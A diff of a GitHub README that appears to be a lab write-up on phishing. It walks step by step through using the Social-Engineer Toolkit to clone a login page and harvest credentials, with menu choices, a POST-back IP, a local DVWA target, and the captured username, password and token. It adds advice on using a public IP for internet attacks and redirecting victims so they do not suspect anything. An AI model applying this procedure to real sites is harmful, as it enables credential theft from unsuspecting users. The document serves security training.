mashach/Web-cloning-and-SMB-social-engineering/README.md

 # Web-cloning-and-SMB-social-engineering
+sudo setoolkit

+# Navigating to Web Attacks
+Select from the menu: 2
+Why: We choose "Website Attack Vectors" because we want to create a fake website

+# Choosing Attack Type

+set:webattack> 3
+Credential Harvester: Clones a real website and captures login credentials

+Other options: Java Applet, Metasploit Browser, Tabnabbing, Web Jacking, etc.

+# Selecting Cloning Method
+text
+set:webattack> 2
+Three Options:

+Web Templates: Pre-made fake login pages

+Site Cloner: Exact copy of any website (we chose this)

+Custom Import: Upload your own HTML file

+# Configuration Settings

+Enter the IP address for POST back in Harvester/Tabnabbing: 10.6.6.1
+Important: This must be your external/public IP if attacking over the internet

+Our case: We used local IP 10.6.6.1 for lab environment

+Why needed: Tells the fake site where to send captured credentials

+# Cloning Target Website
+text
+Enter the url to clone: http://dvwa.vm
+Target: DVWA (Damn Vulnerable Web Application) running locally

+Process: SET downloads all website files to create an identical copy

+Note: Works with both HTTP and HTTPS sites

+ How the Attack Works
+The Trap:
+Victim visits: User goes to our fake website (looks identical to real site)

+Enter credentials: User types username and password

+Capture happens: Instead of sending to real server, data goes to our SET server

+Redirect: User gets redirected to real site (so they don't suspect anything)

+What We Captured:
+POSSIBLE USERNAME FIELD FOUND: username=kali
+POSSIBLE PASSWORD FIELD FOUND: password=kali
+POSSIBLE USERNAME FIELD FOUND: Login=Login
+POSSIBLE USERNAME FIELD FOUND: user_token=513ea6844925da369b97d106b849a5de
+Credentials: Username kali and password kali

+Additional data: Login button text and CSRF token

+# SMB-social-engineering
 # Becoming Root
 ## sudo su
 Explanation: This command switches the user to root (superuser) to have necessary permissions for scanning and enumeration.